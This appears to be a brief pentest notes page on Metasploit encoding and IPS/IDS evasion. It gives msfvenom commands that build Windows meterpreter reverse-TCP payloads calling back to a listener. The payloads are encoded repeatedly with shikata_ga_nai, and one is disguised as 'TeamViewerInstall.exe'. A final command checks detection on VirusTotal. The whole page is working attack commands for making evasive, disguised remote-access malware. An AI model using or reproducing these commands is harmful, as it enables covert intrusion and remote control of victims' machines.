Metasploit

Encoding / IPS/IDS evasion

Notes and commands for Encoding / IPS/IDS evasion.

2024-03-04
Tags toolsmetasploitencoding-ips-ids-evasion

creting a payload with msfvenom

  • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe

  • msfvenom windows/x86/meterpreter_reverse_tcp LHOST=192.168.246.133 LPORT=7272 -k -e x86/shikata_ga_nai -a x86 --platform windows -o ~/test.js -i 10

checking with virustotal

  • msf-virustotal -k <API key> -f TeamViewerInstall.exe